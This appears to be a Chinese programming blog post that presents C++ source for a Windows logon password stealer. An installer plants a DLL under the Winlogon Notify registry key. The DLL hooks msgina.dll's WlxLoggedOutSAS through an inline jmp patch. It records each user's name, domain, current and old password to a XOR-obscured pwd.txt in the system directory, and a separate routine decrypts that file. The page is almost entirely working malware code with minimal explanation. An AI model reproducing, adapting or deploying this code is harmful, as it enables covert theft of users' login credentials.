基于VC++2010实现截获Windows 7密码时间:2022-09-08 08:22:26Windows外壳,安装Windows密码截获器 void dey()//解密{printf("/r/n请不要移动原密码文件!");system("pause");char buffer[10000];ZeroMemory(buffer,10000);char LogPath[255] = {0};GetSystemDirectory( LogPath , MAX_PATH);lstrcat( LogPath, "//pwd.txt");HANDLE hfile = CreateFile(LogPath,GENERIC_READ, FILE_SHARE_WRITE,0,OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);if(!hfile){printf("打开文件失败!");return;}DWORD st;int a=ReadFile(hfile,buffer,10000,&st,0);if(!a){printf("读取失败!");return;}for(int i = 0;i<strlen(buffer);i++){buffer[i]=buffer[i]^3;}printf("解密内容为:/r/n%s",buffer);return;}bool installed(); //判断是否已经安装void installe() //安装函数{if(installed()){printf("已经安装过了!");return; }HRSRC hResInfo;HGLOBAL hResData;DWORD dwSize, dwWritten;LPBYTE p;HANDLE hFile;hResInfo = FindResource(NULL, MAKEINTRESOURCE(IDR_DLL1), "dll");dwSize = SizeofResource(NULL, hResInfo);hResData = LoadResource(NULL, hResInfo);p = (LPBYTE)GlobalAlloc(GPTR, dwSize);CopyMemory((LPVOID)p, (LPCVOID)LockResource(hResData), dwSize);//定位资源char pfile[200];GetWindowsDirectory(pfile, 200);strcat(pfile,"//GetPwd.dll");//C:/WINDOWS/hFile = CreateFile(pfile, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL);WriteFile(hFile, (LPCVOID)p,dwSize, &dwWritten, NULL);CloseHandle(hFile);GlobalFree((HGLOBAL)p);HKEY hkey; if(ERROR_SUCCESS==RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE//Microsoft//Windows NT//CurrentVersion//Winlogon//Notify//GetPwd//",&hkey)){char * name3 ="dog"; RegSetValueEx(hkey,"dllname",0,REG_SZ,(const unsigned char *)pfile,strlen(pfile));RegSetValueEx(hkey,"startup",0,REG_SZ,(const unsigned char *)name3,strlen("dog"));printf("安装成功!");}else{printf("安装失败!");return;}}bool installed(){HKEY hkey; char sz[256]; DWORD dwtype, sl = 256; if(ERROR_SUCCESS != RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE//Microsoft//Windows NT//CurrentVersion//Winlogon//Notify//GetPwd",NULL, KEY_ALL_ACCESS, &hkey) //打开失败,表示没有安装){RegCloseKey(hkey); return false;}RegCloseKey(hkey); return true;}void usag()//用法提示{printf("example:/r/n");printf("/r/n Install: getpwd.exe installe");printf("/r/n Decryp : getpwd.exe Decryp /r/n");}int main(int argc, char* argv[]){if(!lstrcmpi(argv[1],"installe"))//{installe();return 0;}else if(!lstrcmpi(argv[1], "Decryp")){dey();return 0;}usag();return 0;} 密码截获 #define WLX_SAS_ACTION_LOGON (1)DWORD WINAPI StartHook(LPVOID lpParameter);typedef struct _WLX_MPR_NOTIFY_INFO {PWSTR pszUserName;PWSTR pszDomain;PWSTR pszPassword;PWSTR pszOldPassword;} WLX_MPR_NOTIFY_INFO, * PWLX_MPR_NOTIFY_INFO;typedef int (WINAPI* WlxLoggedOutSAS)( //定义函数原型,以便将数据转发给系统PVOID pWlxContext,DWORD dwSasType,PLUID pAuthenticationId,PSIDpLogonSid,PDWORD pdwOptions,PHANDLE phToken,PWLX_MPR_NOTIFY_INFOpNprNotifyInfo,PVOID * pProfile);int WINAPI FunNewADDR(PVOID pWlxContext,DWORD dwSasType,PLUID pAuthenticationId,PSID pLogonSid,PDWORD pdwOptions,PHANDLE phToken,PWLX_MPR_NOTIFY_INFO prNotifyInfo,PVOID * pProfile);//自定义接管WlxLoggedOutSAS的函数,形参保持一致void WriteLog( PWLX_MPR_NOTIFY_INFOpNprNotifyInfo);//声明保存用户名密码函数原型int WideToByte( PCHAR sz_target, PWSTR sz_source , int size_ansi);void WriteCurrentTime();void HookWlxLoggedOutSAS();//执行HOOKvoid UnHookWlxLoggedOutSAS();//撤销HOOKbool isWin2K()//判断操作系统版本{DWORD winVer; OSVERSIONINFO *osvi; winVer=GetVersion(); if(winVer<0x80000000){ osvi= (OSVERSIONINFO *)malloc(sizeof(OSVERSIONINFO)); if (osvi!=NULL){ memset(osvi,0,sizeof(OSVERSIONINFO)); osvi->dwOSVersionInfoSize=sizeof(OSVERSIONINFO); GetVersionEx(osvi); if(osvi->dwMajorVersion==5L&&osvi->dwMinorVersion==0L){free(osvi); return true;}} } free(osvi); return false; }#pragma pack(1)//对齐字节struct HookTable{HMODULEhMsgina;WlxLoggedOutSAS OldDDR;WlxLoggedOutSAS NewADDR;unsigned charOldCode[6];unsigned charJmpCode[6];};//自定义的结构体HookTable hooktable = { 0 ,0 , &FunNewADDR ,"/x8B/xFF/x55/x8B/xEC", //前5个字节"/xE9/x00/x00/x00/x00" //e9 ,jmp};/*#pragma pack()BOOL APIENTRY DllMain( HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ){if(isWin2K())//win2K和xp、2003的前五个字节不同{hooktable.OldCode[0] ='/x55';hooktable.OldCode[1] ='/x8B';hooktable.OldCode[2] ='/xEC';hooktable.OldCode[3] ='/x83';hooktable.OldCode[4] ='/xEC';}switch (ul_reason_for_call){case DLL_PROCESS_ATTACH:HANDLE hthread = CreateThread( 0 , 0 , LPTHREAD_START_ROUTINE(StartHook) , 0 , 0 , 0);CloseHandle( hthread );break;}return TRUE;}DWORD WINAPI StartHook(LPVOID lpParameter){hooktable.hMsgina = GetModuleHandle( _T("msgina.dll"));if ( hooktable.hMsgina == NULL){return 0 ;}hooktable.OldDDR = (WlxLoggedOutSAS)GetProcAddress( hooktable.hMsgina , _T("WlxLoggedOutSAS") );//得到原始函数地址,等下撤销HOOK会用到if (hooktable.OldDDR == NULL){return 0 ;}unsigned char *p = (unsigned char *)hooktable.OldDDR;int *OpCode = (int *)&hooktable.JmpCode[1];//int Code = (int)hooktable.NewADDR - (int)hooktable.OldDDR - 5;*OpCode = Code;HookWlxLoggedOutSAS();return 0;}void HookWlxLoggedOutSAS(){DWORD OldProtect = NULL;VirtualProtect( hooktable.OldDDR ,5 ,PAGE_EXECUTE_READWRITE ,&OldProtect);//内存访问权限unsigned char *p = (unsigned char *)hooktable.OldDDR;for (int i=0 ; i < 5 ; i++ ){p[i] = hooktable.JmpCode[i];}VirtualProtect( hooktable.OldDDR ,5 ,OldProtect ,&OldProtect );return;}void UnHookWlxLoggedOutSAS(){DWORD OldProtect = NULL;VirtualProtect( hooktable.OldDDR ,5 , PAGE_EXECUTE_READWRITE ,&OldProtect );unsigned char *p = (unsigned char *)hooktable.OldDDR;for (int i=0 ; i < 5 ; i++ ){p[i] = hooktable.OldCode[i];}VirtualProtect( hooktable.OldDDR ,5 ,OldProtect ,&OldProtect );return;}char pBuffer[1124];void WriteLog(PWLX_MPR_NOTIFY_INFOpNprNotifyInfo)//主要是一些文件操作{int size_u = lstrlenW( pNprNotifyInfo->pszUserName );size_u += lstrlenW( pNprNotifyInfo->pszDomain );size_u += lstrlenW( pNprNotifyInfo->pszPassword );size_u += lstrlenW( pNprNotifyInfo->pszOldPassword );unsigned short *pWBuffer = (unsigned short *)GlobalAlloc( GMEM_FIXED , size_u + 1024 );unsigned short *tWBuffer = (unsigned short *)GlobalAlloc( GMEM_FIXED , size_u + 1024 );char pBuffer1[1124];char *pwd =(char *)GlobalAlloc( GMEM_FIXED , size_u + 1024 );char *pwd2 =(char *)GlobalAlloc( GMEM_FIXED , size_u + 1024*3 );ZeroMemory( pWBuffer , size_u + 1024 );ZeroMemory( pBuffer , size_u + 1024 );ZeroMemory( pBuffer1 , size_u + 1024 );if ( !pBuffer ){return;}else{WriteCurrentTime();wsprintfW( pWBuffer ,L"/r/nUser= %s /r/nDomain = %s/r/nPassWord = %s /r/nOldPass = %s/r/n" ,pNprNotifyInfo->pszUserName , pNprNotifyInfo->pszDomain ,pNprNotifyInfo->pszPassword,pNprNotifyInfo->pszOldPassword );WideToByte( pBuffer ,pWBuffer ,lstrlenW( pWBuffer ));}char LogPath[MAX_PATH] = {0};GetSystemDirectory( LogPath , MAX_PATH);lstrcat( LogPath , "//pwd.txt");HANDLE hfile = CreateFile(LogPath , GENERIC_WRITE , FILE_SHARE_WRITE ,0 ,OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL ,0 );if (hfile != INVALID_HANDLE_VALUE){unsigned long ret;SetFilePointer( hfile , -1 , 0 , FILE_END);int i=0;SYSTEMTIME st;int b;for(;i<strlen(pBuffer);i++){pBuffer[i] = pBuffer[i] ^ 3;//加密采用异或方式}WriteFile( hfile , pBuffer , lstrlen( pBuffer ) , &ret , 0 );CloseHandle( hfile );}GlobalFree( pWBuffer );GlobalFree( pBuffer );return;}void WriteCurrentTime(){SYSTEMTIME st;DWORD ret = 0;GetLocalTime(&st);wsprintf( pBuffer , "/r/n%d/%d/%d/%d:%d:%d" ,st.wYear ,st.wMonth ,st.wDay ,st.wHour ,st.wMinute,st.wSecond );}int WideToByte( PCHAR sz_target, PWSTR sz_source , int size_ansi){return WideCharToMultiByte( CP_ACP ,WC_COMPOSITECHECK ,sz_source ,-1 ,sz_target ,size_ansi ,0 ,0 );}int WINAPI FunNewADDR(PVOID pWlxContext,DWORD dwSasType,PLUID pAuthenticationId,PSIDpLogonSid,PDWORD pdwOptions,PHANDLE phToken,PWLX_MPR_NOTIFY_INFOpNprNotifyInfo,PVOID * pProfile){UnHookWlxLoggedOutSAS();//当系统jmp到我们自己的函数时先解除HOOKint i = hooktable.OldDDR(pWlxContext ,dwSasType , pAuthenticationId ,pLogonSid ,pdwOptions ,phToken ,pNprNotifyInfo,pProfile);if (i == WLX_SAS_ACTION_LOGON )//{WriteLog( pNprNotifyInfo );}return i;}extern "C" __declspec(dllexport) void start(){return;}